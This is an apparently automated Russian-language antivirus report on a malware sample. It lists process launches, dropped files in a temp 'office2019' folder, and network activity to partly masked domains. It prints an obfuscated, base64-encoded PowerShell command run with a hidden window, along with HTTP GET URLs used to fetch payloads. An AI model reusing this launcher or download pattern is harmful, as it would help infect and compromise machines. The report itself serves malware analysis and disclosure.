Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAGEAcwA5AGsAbwA2AD0AKAAnAFoAdwBlADgAJwArACcAaABzADQAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AGUAbQBwAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1151864.cvr
- %TEMP%\office2019\tuizqjt.exe
Удаляет следующие файлы
- %TEMP%\office2019\tuizqjt.exe
Подменяет следующие файлы
- %TEMP%\office2019\tuizqjt.exe
Сетевая активность
Подключается к
- 'st###snet.nl':443
- 'th####ishmedia.nl':80
- 'di####awsmedia.com':443
- 'tu##k.de':80
- 'va#i.de':80
- 'va###ngen.de':80
- 'va###ngen.de':443
- 'to##-mi.de':80
TCP
Запросы HTTP GET
- http://th####ishmedia.nl/Dev/8/
- http://tu##k.de/cgi-bin/LROR4jp/
- http://va#i.de/Minecraft/bHY/
- http://va###ngen.de/bilder/k5a0v3Z/
- http://to##-mi.de/cgi-bin/iQ/
Другие
- 'st###snet.nl':443
- 'di####awsmedia.com':443
- 'th####ishmedia.nl':443
UDP
- DNS ASK st###snet.nl
- DNS ASK th####ishmedia.nl
- DNS ASK di####awsmedia.com
- DNS ASK tu##k.de
- DNS ASK va#i.de
- DNS ASK va###ngen.de
- DNS ASK to##-mi.de
- DNS ASK co###thief.dk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAGEAcwA5AGsAbwA2AD0AKAAnAFoAdwBlADgAJwArACcAaABzADQAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AGUAbQBwAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)
